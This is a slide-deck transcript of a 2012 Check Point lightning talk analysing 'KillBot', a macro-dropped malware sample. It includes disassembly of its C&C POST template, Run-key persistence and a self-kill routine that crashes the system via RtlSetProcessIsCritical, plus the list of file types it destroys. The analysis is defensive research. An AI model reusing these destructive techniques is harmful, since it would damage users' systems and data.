©2012 Check Point Software Technologies Ltd. KillBot: Conspiracy Theories Inbar Raz hack.lu lightning talk 25 October 2012 [Protected] For public distribution.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Rev SYBASE ASE: MDA TABLE ASSISTANT Sybase Administration Tools available at: mailto:
Thank you to IT Training at Indiana University Computer Malware.
1 NCDesk % of the test will be Telecommunication/Internet Questions.
BASIC CRYPTOGRAPHY CONCEPT. Secure Socket Layer (SSL)  SSL was first used by Netscape.  To ensure security of data sent through HTTP, LDAP or POP3.
Welcome to the MIRC & NoName Script Tutorial Created by Buzz & Jet 1/31.
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
CIS101 Introduction to Computing Week 05. Agenda Your questions CIS101 Survey Introduction to the Internet & HTML Online HTML Resources Using the HTML.
IST346:  Web Services. Today’s Agenda  Learn the basics of how the Web works  Understand various web service architectures  Address scaling, security,
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
By Hassan Abu daqen & montaser elsabe3 & Nidal Abu saif.
Evaluating Web Server Log Analysis Tools David Strom SD’98 2/13/98.
Speak A Simple VoIP Application Project 2 Due date: March 3 rd by 11:59pm.
Peter R. Pietzuch Ioannis Papagiannis Peter Pietzuch Large-Scale Distributed Systems Group ACM Cloud Computing.
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
OCR Nationals – Unit 1 AO2 (Part 2) – s. Overview of AO2 (Part 2) To select and use tools and facilities to download files/information and to send.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
Computer Viruses Preetha Annamalai Niranjan Potnis.
APT29 HAMMERTOSS Jayakrishnan M.
Advanced Spreadsheet Skills for Game Designers
Key Words: File systems, Steganography, Encrypted Communications, RAID, Information Hiding, Intelligence, Instagram, flickr Original can be found at:
ITIS 1210 Introduction to Web-Based Information Systems Chapter 45 How Hackers can Cripple the Internet and Attack Your PC How Hackers can Cripple the.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
2012 4th International Conference on Cyber Conflict C. Czosseck, R. Ottis, K. Ziolkowski (Eds.) 2012 © NATO CCD COE Publications, Tallinn 朱祐呈.
CHAPTER 14 Viruses, Trojan Horses and Worms. INTRODUCTION Viruses, Trojan Horses and worm are malicious programs that can cause damage to information.
1 Higher Computing Topic 8: Supporting Software Updated
Understanding Technology Crime Investigation for Managers.
CRIME - A crime is a wrongdoing classified by the state or Congress as a felony or misdemeanor. A crime is an offence against a public law. This word,
Chapter 5 Protecting Your PC from Viruses Prepared by: Khurram N. Shamsi.
CSCI 530 Lab Intrusion Detection Systems IDS. A collection of techniques and methodologies used to monitor suspicious activities both at the network and.
1 Figure 4-16: Malicious Software (Malware) Malware: Malicious software Essentially an automated attack robot capable of doing much damage Usually target-of-opportunity.
Attacks On systems And Networks To understand how we can protect our system and network we need to know about what kind of attacks a hacker/cracker would.
By Michael Carlisle CpSc 420 December 6, Worms – A Definition!  Worm – a program that copies itself from one computer to another.
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
 Chapter 14 – Security Engineering 1 Chapter 12 Dependability and Security Specification 1.
Computer Security! Emma Campbell, 8K VirusesHackingBackups.
~Computer Virus~ The things you MUST know Brought to You By Sumanta Majumdar Dept. Of Electrical Engg. 2010,GNIT
1 Topic 2: Lesson 3 Intro to Firewalls Summary. 2 Basic questions What is a firewall? What is a firewall? What can a firewall do? What can a firewall.
Web User Controls This presentation will cover the basics of defining, creating and using a web user control. Presented to Twin Cities.NET user group By.
Recent Internet Viruses & Worms By Doppalapudi Raghu.
Computer Viruses and Worms By: Monika Gupta Monika Gupta.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
TCP Sockets Reliable Communication. TCP As mentioned before, TCP sits on top of other layers (IP, hardware) and implements Reliability In-order delivery.
Priya Ranjan Kumar Dept. Of Computer Science Engg. 2012, RIT.
Computer security By Isabelle Cooper.
Amit Malik SecurityXploded Research Group FireEye Labs.
Sid Stamm, Zulfikar Ramzan and Markus Jokobsson Erkang Xu.
 Registry itself is easy and straightforward in implementation  The objects of registry are actually complicated to store and manage  Objects of Registry.
CS2910 Week 5, Class 2 Today DNS Muddy Points More HTTP Headers Review for Midterm Exam This coming Monday: Midterm Exam SE-2811 Slide design: Dr. Mark.
In peer-to-peer networks such as gnutella, each host must search out other hosts. When a host finds another host, these hosts become neighbors. Often a.
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
Module: Software Engineering of Web Applications Chapter 2: Technologies 1.
Computer Security By Duncan Hall.
Computer threats, Attacks and Assets upasana pandit T.E comp.
Chapter 6 Discovering the Scope of the Incident Spring Incident Response & Computer Forensics.
A PC Wakes Up A STORY BY VICTOR NORMAN. Once upon a time…  a PC (we’ll call him “H”) is connected to a network and turned on. Aside: The network looks.
Secure Transactions Chapter 17. The user's machine No control over security of user's machine –Might be in very insecure: library, school, &c. Users disable.
©2016 Check Point Software Technologies Ltd. 1 Latest threats…. Rolando Panez | Security Engineer RANSOMWARE.
©2015 Check Point Software Technologies Ltd. 1 Website Watering Holes Endpoints are at risk in numerous ways, especially when social engineering is applied.
Run the on your PC to start the firmware configuration process Run IP Config Tool.
SAMET KARTAL No one wants to share own information with unknown person. Sometimes while sharing something with someone people wants to keep.
©2014 Check Point Software Technologies Ltd Security Report “Critical Security Trends and What You Need to Know Today” Nick Hampson Security Engineering.
Internet Vulnerabilities & Criminal Activity Internet Forensics 12.1 April 26, 2010 Internet Forensics 12.1 April 26, 2010.
Traffic Analysis– Wireshark Simple Example
Featured Enhancements to the IDE & Debugger
SPRING DRAGON APT - A CASE STUDY OF TARGETED ATTACKS IN APAC COUNTRIES
A Distributed DoS in Action
Traffic Analysis– Wireshark Simple Example
Chapter 7 – and 8 pp 155 – 202 of Web security by Lincoln D. Stein
The Troubleshooting theory
Presentation transcript:

©2012 Check Point Software Technologies Ltd. KillBot: Conspiracy Theories Inbar Raz hack.lu lightning talk 25 October 2012 [Protected] For public distribution

2 2©2012 Check Point Software Technologies Ltd. Why am I giving this talk?  Too much social engineering talk got me excited.  Luxembourg trip and dinner are for speakers only. [Protected] For public distribution

3 3©2012 Check Point Software Technologies Ltd. Why am I giving this talk?  Cover story: I’m giving a lightning talk! [Protected] For public distribution

4 4©2012 Check Point Software Technologies Ltd. Why am I giving this talk?  It worked  Only problem: Turns out I actually need to give a talk.  Luckily, I have one ready. [Protected] For public distribution

5 5©2012 Check Point Software Technologies Ltd. Agenda 1 Background 2 Coding peculiarities 3 Logic peculiarities 4 Conspiracy Theories [Protected] For public distribution

6 6©2012 Check Point Software Technologies Ltd. Background  A malicious Word document is detected.  The document drops and executes an EXE file.  Time of attack: :55:54 (US)  End of preliminary analysis: :45 (Israel)  Within two days, 2 more attacks are documented –EXE was sent directly by mail (no encapsulation). –Targets were not Check Point customers. –On at least one of the cases the KillBot succeeded. [Protected] For public distribution

7 7©2012 Check Point Software Technologies Ltd. Agenda 1 Background 2 Coding peculiarities 3 Logic peculiarities 4 Conspiracy Theories [Protected] For public distribution

8 8©2012 Check Point Software Technologies Ltd. No sophistication whatsoever  No Zero-Day vulnerabilities used.  Enabled Macros required for dropping the EXE. –They don’t have Minos…  This makes an “affordable loss”. [Protected] For public distribution

9 9©2012 Check Point Software Technologies Ltd. Almost no protection  EXE is neither packed nor encrypted.  Server IP, HTTP message and bot name in plain text:.rdata: aHTTP_POST db 'POST %s HTTP/1.0',0Dh,0Ah.rdata: db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah.rdata: db 'Content-transfer-encoding: base64',0Dh,0Ah.rdata: db 'Content-Length: %d',0Dh,0Ah.rdata: db 'Host: %s',0Dh,0Ah.rdata: db 'Connection: Keep-Alive',0Dh,0Ah.rdata: db 0Dh,0Ah.rdata: db 'id=%s&code=2&md5=wer&data=',0.data: C server_ip db ' ',0.data: C aServerPath db '/fl/task',0.data: aKillbot db 'KillBOt',0  BUT: Encrypted Registry Key name –SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ –This string is always a cause for alarm… [Protected] For public distribution

10 ©2012 Check Point Software Technologies Ltd. Partial debug information  When loaded to IDA:  Inside disassembly:.rdata:004028E0 ; Debug Information resource.rdata:004028E0 dd 'SDSR' ; MagicWord - RSDS signature.rdata:004028E0 db 031h,06Dh,049h,0FAh,004h,0C2h,083h,046h ; GUID.rdata:004028E0 db 0A1h,098h,00Fh,0A1h,082h,0EAh,0ECh,05Fh ; GUID.rdata:004028E0 dd 1 ; Age.rdata:004028E0 db 'C:\Users\admin\Documents\projects\loader\Screen\Release\killAll_exe.pdb',0’ ; FilePath [Protected] For public distribution

11 ©2012 Check Point Software Technologies Ltd. Unnecessarily duplicated code  “KillSelf()” function:.text:004012C0 push 0 ; lParam.text:004012C2 push 0F020h ; wParam.text:004012C7 push 112h ; Msg.text:004012CC push 1 ; gaFlags.text:004012CE push 0 ; lpszWindow.text:004012D0 push 0 ; lpszClass.text:004012D2 push 0 ; hWndChildAfter.text:004012D4 push 0FFFFFFFDh ; hWndParent.text:004012D6 call ds:FindWindowExW.text:004012DC push eax ; hwnd.text:004012DD call ds:GetAncestor.text:004012E3 push eax ; hWnd.text:004012E4 call ds:PostMessageW.text:004012EA call ElevatePriviledge.text:004012EF push offset LibFileName ; "ntdll.dll“.text:004012F4 call ds:LoadLibraryA.text:004012FA push offset ProcName ; "RtlSetProcessIsCritical“.text:004012FF push eax ; hModule.text: call ds:GetProcAddress.text: push 0 ; void* u.text: push 0 ; bool* pOld.text: A push 1 ; bool IsCritical.text: C call eax ; int __cdecl NTDLL:RtlSetProcessIsCritical().text: E push 222 ; uExitCode.text: call ds:GetCurrentProcess.text: push eax ; hProcess.text: A call ds:TerminateProcess [Protected] For public distribution

12 ©2012 Check Point Software Technologies Ltd. Unnecessarily duplicated code  BUT, the end of “ThreadMain()” function:.text: D push 0 ; lParam.text: F push 0F020h ; wParam.text: push 112h ; Msg.text: push 1 ; gaFlags.text: B push 0 ; lpszWindow.text: D push 0 ; lpszClass.text: F push 0 ; hWndChildAfter.text: push 0FFFFFFFDh ; hWndParent.text: call ds:FindWindowExW.text: push eax ; hwnd.text: A call ds:GetAncestor.text: push eax ; hWnd.text: call ds:PostMessageW.text: call ElevatePriviledge.text: C push offset LibFileName ; "ntdll.dll“.text: call ds:LoadLibraryA.text: push offset ProcName ; "RtlSetProcessIsCritical“.text: C push eax ; hModule.text: D call ds:GetProcAddress.text: push 0 ; void* u.text: push 0 ; bool* pOld.text: push 1 ; bool IsCritical.text: call eax ; int __cdecl NTDLL:RtlSetProcessIsCritical().text: B push 222 ; uExitCode.text:004019A0 call ds:GetCurrentProcess.text:004019A6 push eax ; hProcess.text:004019A7 call ds:TerminateProcess [Protected] For public distribution

13 ©2012 Check Point Software Technologies Ltd. One more time… [Protected] For public distribution

14 ©2012 Check Point Software Technologies Ltd. Unnecessarily duplicated code  “KillSelf()” function:.text:004012C0 push 0 ; lParam.text:004012C2 push 0F020h ; wParam.text:004012C7 push 112h ; Msg.text:004012CC push 1 ; gaFlags.text:004012CE push 0 ; lpszWindow.text:004012D0 push 0 ; lpszClass.text:004012D2 push 0 ; hWndChildAfter.text:004012D4 push 0FFFFFFFDh ; hWndParent.text:004012D6 call ds:FindWindowExW.text:004012DC push eax ; hwnd.text:004012DD call ds:GetAncestor.text:004012E3 push eax ; hWnd.text:004012E4 call ds:PostMessageW.text:004012EA call ElevatePriviledge.text:004012EF push offset LibFileName ; "ntdll.dll“.text:004012F4 call ds:LoadLibraryA.text:004012FA push offset ProcName ; "RtlSetProcessIsCritical“.text:004012FF push eax ; hModule.text: call ds:GetProcAddress.text: push 0 ; void* u.text: push 0 ; bool* pOld.text: A push 1 ; bool IsCritical.text: C call eax ; int __cdecl NTDLL:RtlSetProcessIsCritical().text: E push 222 ; uExitCode.text: call ds:GetCurrentProcess.text: push eax ; hProcess.text: A call ds:TerminateProcess [Protected] For public distribution

15 ©2012 Check Point Software Technologies Ltd. Unnecessarily duplicated code  BUT, the end of “ThreadMain()” function:.text: D push 0 ; lParam.text: F push 0F020h ; wParam.text: push 112h ; Msg.text: push 1 ; gaFlags.text: B push 0 ; lpszWindow.text: D push 0 ; lpszClass.text: F push 0 ; hWndChildAfter.text: push 0FFFFFFFDh ; hWndParent.text: call ds:FindWindowExW.text: push eax ; hwnd.text: A call ds:GetAncestor.text: push eax ; hWnd.text: call ds:PostMessageW.text: call ElevatePriviledge.text: C push offset LibFileName ; "ntdll.dll“.text: call ds:LoadLibraryA.text: push offset ProcName ; "RtlSetProcessIsCritical“.text: C push eax ; hModule.text: D call ds:GetProcAddress.text: push 0 ; void* u.text: push 0 ; bool* pOld.text: push 1 ; bool IsCritical.text: call eax ; int __cdecl NTDLL:RtlSetProcessIsCritical().text: B push 222 ; uExitCode.text:004019A0 call ds:GetCurrentProcess.text:004019A6 push eax ; hProcess.text:004019A7 call ds:TerminateProcess [Protected] For public distribution

16 ©2012 Check Point Software Technologies Ltd. Agenda 1 Background 2 Coding peculiarities 3 Logic peculiarities 4 Conspiracy Theories [Protected] For public distribution

17 ©2012 Check Point Software Technologies Ltd. Document Name  Unordinary and suspicion-arising name: –“xc8xedxf1xf2xf0xf3xeaxf6xe8xff_xecxe8xf2xe8xedxe3.doc”  Is actually Windows-1251 (Cyrillic script): –Инстукция митинг –Instruction Meeting –Russians in the crowd: Did I get this right? [Protected] For public distribution

18 ©2012 Check Point Software Technologies Ltd. Involved IP addresses  C&C Server IP: –Registered to “TRADE COMPANY TANJA s.r.o.” –Located in Prague, Czech Republic  Sending Mail Server IP: –Registered to “Asiatech DSL Broadband Services” –Located in Tehran, Iran  No attempt was made to hide either address [Protected] For public distribution

19 ©2012 Check Point Software Technologies Ltd. Incomplete communications logic  Data Validation: –“id=” and “code=” in response. –Code value must not start with ‘0’.  If validation succeeds: –Leave socket open! –But… exit.  Either way: –Do nothing. send() recv() Valid Data exit Close socket exit Fail No Success Yes [Protected] For public distribution

20 ©2012 Check Point Software Technologies Ltd. File type “Kill List”  KillBot iterates on all files and directories.  Looks for the following substrings (not extensions): –.msc –.exe –.doc –.xls –.rar –.zip –.7z  DLL files are not on the list, but MSC files are. [Protected] For public distribution

21 ©2012 Check Point Software Technologies Ltd. Agenda 1 Background 2 Coding peculiarities 3 Logic peculiarities 4 Conspiracy Theories [Protected] For public distribution

22 ©2012 Check Point Software Technologies Ltd. Suspicious facts  It’s obvious that code has been commented out: –Socket is intentionally left open but nothing else happens. –No code processes the response from C&C.  KillBot makes no attempt to hide itself or its origin: –It causes damage, which alerts victim. –This is not so common anymore. –IP addresses are visible. –Iran as a source – Really? [Protected] For public distribution

23 ©2012 Check Point Software Technologies Ltd. Conclusions  We’re not seeing the whole picture.  Code could be either a Proof-of-Concept or a Test Drive –Option 1: Testing the customer’s susceptibility –Customer is now alert –Option 2: Testing the technology –The customer was a random target  Iran is not necessarily not involved –Option 1: Someone is throwing dirt – they’re easy to blame –Option 2: This is a script kiddie (We’re not so sure about this anymore…) [Protected] For public distribution

24 ©2012 Check Point Software Technologies Ltd. Questions? [Protected] For public distribution

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.